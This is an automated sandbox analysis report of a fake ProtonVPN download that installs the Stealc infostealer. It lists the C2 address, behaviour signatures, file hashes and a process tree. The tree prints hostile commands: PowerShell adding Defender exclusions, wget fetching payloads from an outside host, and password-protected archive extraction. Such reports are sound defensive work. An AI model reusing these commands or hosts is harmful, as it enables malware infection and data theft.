Analysis

  • max time kernel
    154s
  • max time network
    252s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-03-2024 12:47

General

  • Target

    https://vpngets.com/protonvpn

Malware Config

Extracted

Family

stealc

C2

http://farozinda.ru

Attributes
  • url_path

    /b873445ecb337e99.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 58 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 16 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://vpngets.com/protonvpn
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2452
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff98f4c9758,0x7ff98f4c9768,0x7ff98f4c9778
      2⤵
        PID:4596
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:2
        2⤵
          PID:768
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:8
          2⤵
            PID:5116
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:8
            2⤵
              PID:4980
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:1
              2⤵
                PID:2536
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:1
                2⤵
                  PID:4228
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5132 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:8
                  2⤵
                    PID:3428
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:8
                    2⤵
                      PID:912
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:8
                      2⤵
                        PID:688
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5608 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:1
                        2⤵
                          PID:5568
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:8
                          2⤵
                            PID:5400
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3628 --field-trial-handle=2052,i,11555985053950799205,14894055410394826620,131072 /prefetch:2
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3632
                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                          1⤵
                            PID:3188
                          • C:\Windows\system32\AUDIODG.EXE
                            C:\Windows\system32\AUDIODG.EXE 0x540 0x530
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5156
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:8
                            1⤵
                              PID:5148
                            • C:\Windows\System32\rundll32.exe
                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              1⤵
                                PID:2964
                              • C:\Windows\system32\werfault.exe
                                werfault.exe /h /shared Global\8781732d71bb4b49a0ac302250d3dd18 /t 5772 /p 3496
                                1⤵
                                  PID:3656
                                • C:\Windows\explorer.exe
                                  explorer.exe
                                  1⤵
                                  • Modifies Installed Components in the registry
                                  • Enumerates connected drives
                                  • Checks SCSI registry key(s)
                                  • Modifies Internet Explorer settings
                                  • Modifies registry class
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3776
                                  • C:\Program Files\7-Zip\7zG.exe
                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14635:92:7zEvent27849
                                    2⤵
                                      PID:2780
                                    • C:\Users\Admin\Downloads\Launcher.exe
                                      "C:\Users\Admin\Downloads\Launcher.exe"
                                      2⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      PID:4324
                                      • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
                                        "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
                                        3⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:4388
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1364
                                          • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
                                            "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
                                            5⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            PID:736
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
                                              6⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4784
                                            • C:\Users\Admin\AppData\Roaming\services\wget.exe
                                              "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
                                              6⤵
                                                PID:4336
                                              • C:\Users\Admin\AppData\Roaming\services\winrar.exe
                                                "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
                                                6⤵
                                                  PID:6536
                                                • C:\Users\Admin\AppData\Roaming\services\plugin0314
                                                  C:\Users\Admin\AppData\Roaming\services\plugin0314
                                                  6⤵
                                                    PID:4708
                                                    • C:\Users\Admin\AppData\Roaming\services\plugin0314
                                                      "C:\Users\Admin\AppData\Roaming\services\plugin0314"
                                                      7⤵
                                                        PID:6276
                                                    • C:\Users\Admin\AppData\Roaming\services\wget.exe
                                                      "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
                                                      6⤵
                                                        PID:5620
                                                      • C:\Users\Admin\AppData\Roaming\services\winrar.exe
                                                        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
                                                        6⤵
                                                          PID:5864
                                                        • C:\Users\Admin\AppData\Roaming\services\2plugin0313
                                                          C:\Users\Admin\AppData\Roaming\services\2plugin0313
                                                          6⤵
                                                            PID:6848
                                                            • C:\Users\Admin\AppData\Roaming\services\2plugin0313
                                                              C:\Users\Admin\AppData\Roaming\services\2plugin0313
                                                              7⤵
                                                                PID:6944
                                                            • C:\Users\Admin\AppData\Roaming\services\wget.exe
                                                              "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
                                                              6⤵
                                                                PID:4148
                                                              • C:\Users\Admin\AppData\Roaming\services\winrar.exe
                                                                "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
                                                                6⤵
                                                                  PID:4488
                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_ProtonVPN-10_11.zip\Launcher.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_ProtonVPN-10_11.zip\Launcher.exe"
                                                          2⤵
                                                            PID:6504
                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_ProtonVPN-10_11.zip\Launcher.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Temp1_ProtonVPN-10_11.zip\Launcher.exe"
                                                            2⤵
                                                              PID:6884
                                                            • C:\Program Files\7-Zip\7zG.exe
                                                              "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap31369:92:7zEvent31814
                                                              2⤵
                                                                PID:5436
                                                              • C:\Users\Admin\Downloads\Launcher.exe
                                                                "C:\Users\Admin\Downloads\Launcher.exe"
                                                                2⤵
                                                                  PID:4964
                                                                • C:\Users\Admin\Downloads\Launcher.exe
                                                                  "C:\Users\Admin\Downloads\Launcher.exe"
                                                                  2⤵
                                                                    PID:7124
                                                                • C:\Windows\System32\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                  1⤵
                                                                    PID:3828
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1516
                                                                  • C:\Windows\System32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                    1⤵
                                                                      PID:1428
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4840
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2080
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:7136
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6612
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5136
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6492
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2948 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:3
                                                                      1⤵
                                                                        PID:3788
                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                        1⤵
                                                                          PID:6628

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\ProgramData\mozglue.dll

                                                                          Filesize

                                                                          593KB

                                                                          MD5

                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                          SHA1

                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                          SHA256

                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                          SHA512

                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

                                                                          Filesize

                                                                          128KB

                                                                          MD5

                                                                          4a085ecec4690a75e84e21dec9dc23da

                                                                          SHA1

                                                                          56b530f9d068755d45f6307b9852752a100e2659

                                                                          SHA256

                                                                          b080f283dc117a19e57638ee0370cf054abb58e4b6266eab4ddd4660e818accf

                                                                          SHA512

                                                                          a3e1a058de1bec9cfc21c04518c1c50f9a70612a5316cab55ea90f2c754ac9040968c6bf6f658ad96a6eba043a93ba230502b9de630209b8c1964eeb3c880595

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                          Filesize

                                                                          336B

                                                                          MD5

                                                                          b1e70d3fb58e0ccbbb73b3ebf1504fb9

                                                                          SHA1

                                                                          af13fa38f8f28b76aea1516e957df69e9a9f7995

                                                                          SHA256

                                                                          1d521f0e8537b49f1b999e00d4b3991add6acfb0129a0594faee97090efab9d3

                                                                          SHA512

                                                                          e6dbea4971ba3d807bcc5504c5d8b2bc9f1960ec8dba5d027642dd994b30c2ed47e87632489c3f6ef8e9cf4e4e552946579c56f59cd8eaac59b09976d33ef99a

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                          Filesize

                                                                          148KB

                                                                          MD5

                                                                          e27b894b0bbdb5aa7ca5f4061360725d

                                                                          SHA1

                                                                          f9fd1fd6e33223bf21987f91212a56718a8354fd

                                                                          SHA256

                                                                          023b535b27cae76fc884c0053a8a845bf1891e3428473bae2b6fbeedfbc95693

                                                                          SHA512

                                                                          56847d2c4810b79cc2abe7a2eb172759ba8a38143127588055d3a74718ea1e2ddc314f984a6f5c0aed6a2b2e43e135ddf88889e78a048e989ab9bbd68d58f955

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                          Filesize

                                                                          20KB

                                                                          MD5

                                                                          0c3f5ed84d1f964da583a8a35cb390de

                                                                          SHA1

                                                                          7a0bdf7279dd5c620f4df26da78078f7f8746adc

                                                                          SHA256

                                                                          e73334b4bec2ec0ff74bad7500e3186dd986701ce922476504c6f8565d06908d

                                                                          SHA512

                                                                          ee4274f74b5c6ef2762585b938ea8f0f9355aab2492032deb97b3880c00fa04993b5c0f8a83a1b87fd51c1e8ed5bcbe936948b2e12776d6a6f24eb5f538cbb6f

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          84c7f2f5a2a8569523dabcb3ed11dd6d

                                                                          SHA1

                                                                          f05261c548f0d7bb7cfdff96326d45355b6df965

                                                                          SHA256

                                                                          113f8ee0268e3bfbe40224a2d3d981425291f7e092ce484abc3f41598090cfe1

                                                                          SHA512

                                                                          09e08293f6231cdfb394c4f0e80515305f2d9c16c56c69e4692f3d405f119368a4df3bee8e1def973eb952f7d182553588e91a56cd5fa915bf1a1f4c1d1ca600

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                          Filesize

                                                                          704B

                                                                          MD5

                                                                          172aa2e4d52455dac2e8a9f76e9714e1

                                                                          SHA1

                                                                          f4e0ee882dff302749d403aa7cc8e30d8f1ef102

                                                                          SHA256

                                                                          217660f2bb34d309a3be5f93adab59c0e57553ca04f655b721f78eea26c2d31d

                                                                          SHA512

                                                                          872a8276579d0e8e64124d5ee5c9efda0512cac5312c90a8037900d81a2616f2ca30a6b328c3957aa56deb048b71d6ceaf360722f730b97fd446d37765b51572

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          a44af4c601979cf2a4388d75df42e874

                                                                          SHA1

                                                                          284142ef46456ff591b54cb4beb19151db9b85be

                                                                          SHA256

                                                                          5be36bb4eb7dde921f2a52e140c0f55dffbfce2802fa4c4b57f32236affb9d5f

                                                                          SHA512

                                                                          05de5dd0245300c5cd6bb888979ea504e1c4f410b4707be5d320b7378d029d04bdffd5854c92ed730855f3478adfeeea3d72a605f17784835dc8067994222609

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          07ba90a56dc03eaa303a6770897f012c

                                                                          SHA1

                                                                          0d4c038e7d3a479f9bf44917c727283e06c7298e

                                                                          SHA256

                                                                          5195b269954e980fdf411c4f2c68b7ac3e272805a5c122a058a97c6295d37f00

                                                                          SHA512

                                                                          ed3e3882f78225f8775e604da11daea35bc165283d6de8b12669392a847f9d2d492f99c049a5add8f8f11417085a81927ca69d4490fd24363f53e79eab9a382a

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          a2c6b741ce73793c8a049105fbba9c14

                                                                          SHA1

                                                                          0301de3f5c3dd5297d4b34d8a1029684c6036f4a

                                                                          SHA256

                                                                          ccc0566298c7113ba94451b58b123e64ab4df32f0add940b7469f9b2f6858195

                                                                          SHA512

                                                                          c1407ef65920b6ca2dae541876a955e83abe216e856ed8c5eb43d2bcde57707d1d2440d5c353fb30b251073e29f6a7e5fe12fd69f9f43c5cb69c73632bf6928d

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                          Filesize

                                                                          128KB

                                                                          MD5

                                                                          585a35f11159cfc67121122609fef48f

                                                                          SHA1

                                                                          55526d88493dd93ef8d2030b12f423dc35b031b7

                                                                          SHA256

                                                                          8551b254859a4d2bfb908bec4fdde894e3fdc83e6291bafde5a7645067205f4b

                                                                          SHA512

                                                                          41465428928990e120e6e6723c52ab663c6bafa1d29dede1e8ac2505b7476711cfb958080db048b3e345a12fc8fa78311044a6e89e96a9d8259877104fd08091

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                          Filesize

                                                                          128KB

                                                                          MD5

                                                                          e804c44bdc59dca62e5c3287b2fde152

                                                                          SHA1

                                                                          9e1485e6c6c4cedb573350d898625fad07f4b07e

                                                                          SHA256

                                                                          70c4ee990509cb34e399ed35d9ed5db6881cae37945b2e9a327cc990955c5232

                                                                          SHA512

                                                                          1273c33ae5359be6031df8d3487f97c1687859e1735828e36262aa4711b853c08873a83ebe8ab42fcbe0680d339b3b1eaf438e087d8fc33d98be38676790752a

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                          Filesize

                                                                          111KB

                                                                          MD5

                                                                          6e90acd8875047b40d78c9ca635188bc

                                                                          SHA1

                                                                          bae7b20fc4c76d00d3968c77f757b0bf3b9a48de

                                                                          SHA256

                                                                          67e00dc3d2150b5667a5adc440462a1770e1083b93c0c0e14f1ff51196f8238e

                                                                          SHA512

                                                                          53ea19275f6bfae3a0f92034406615f2a498bd5cbf808c679f38efc29eed41e0bf805e87c9a066e67bf316cc52dce8289be173bd37fe669115f2e742e8ea9ed1

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5899ab.TMP

                                                                          Filesize

                                                                          107KB

                                                                          MD5

                                                                          4790aff66bb4022b3fef78099ddba3ba

                                                                          SHA1

                                                                          fe0104d822448ed5dcc369d0e29547094a2ceb9b

                                                                          SHA256

                                                                          4074397dd3edab060b4d18165baa6e1614d1189b3f5e8c6d27a23edee0677c17

                                                                          SHA512

                                                                          d3f0dbcf91bad18bfbe19f1564c27d1dd54ba75d30e6f70e37d415dbb78f166f2e3c0d7fe050a22a29298965986b05d658bc95578795baf3da959c2b19dcf003

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                                                          Filesize

                                                                          2B

                                                                          MD5

                                                                          99914b932bd37a50b983c5e7c90ae93b

                                                                          SHA1

                                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                          SHA256

                                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                          SHA512

                                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                          Filesize

                                                                          2B

                                                                          MD5

                                                                          d751713988987e9331980363e24189ce

                                                                          SHA1

                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                          SHA256

                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                          SHA512

                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                          Filesize

                                                                          40B

                                                                          MD5

                                                                          20d4b8fa017a12a108c87f540836e250

                                                                          SHA1

                                                                          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                          SHA256

                                                                          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                          SHA512

                                                                          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

